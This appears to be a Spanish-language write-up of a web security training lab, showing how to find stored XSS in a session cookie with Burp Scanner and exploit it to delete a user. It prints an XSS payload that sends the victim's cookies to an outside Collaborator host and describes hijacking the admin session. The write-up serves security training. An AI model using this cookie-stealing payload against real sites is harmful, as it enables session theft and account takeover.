Scanning non-standard data structures writeup

Descripción

This lab contains a vulnerability that is difficult to find manually. It is located in a non-standard data structure.

To solve the lab, use Burp Scanner’s Scan selected insertion point feature to identify the vulnerability, then manually exploit it and delete carlos.

You can log in to your own account with the following credentials: wiener:peter

Scanning non-standard data structures writeup

Accedemos al laboratorio, entramos en ‘My account’ e iniciamos sesión. Veremos que la cookie de sesión es peculiar:

Es el nombre de usuario ‘wiener’ separado por ‘:’ codificados como URL. Tomaremos la URL ‘/my account’ y pulsaremos Click derecho -> Scan -> Open scan launcher. Al pulsar ‘Ok’, en el ‘Target’ veremos lo siguiente:

El escaner ha encontrado un XSS almacenado en la cookie de sesión. Nos llevaremos la petición al ‘Repeater’ y al seleccionar las cookie el ‘Inspector’ nos mostrará que el XSS está en la primera parte de la cookie:

Tendremos que realizar varios cambios:

  1. Cambiaremos la URL por una generada en el ‘Collaborator’.
  2. Deberemos poner entre ‘()’ lo que hay en la función fetch.

Una vez hecho esto, el resultado final deberá ser:

'"><svg/onload=fetch(`//og864jqkff0768d278li48eyyp4gs6gv.oastify.com/${encodeURIComponent(document.cookie)}`)>:Wevvnfam5lKNrys24FVJXVmiovW6ohXt

Tras un minuto, al vovler al ‘Collaborator’ veremos la siguiente petición:

Sustituiremos la cookie en el navegador, iremos al ‘Admin panel’, borraremos al usuario ‘carlos’ y completaremos el laboratorio:

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *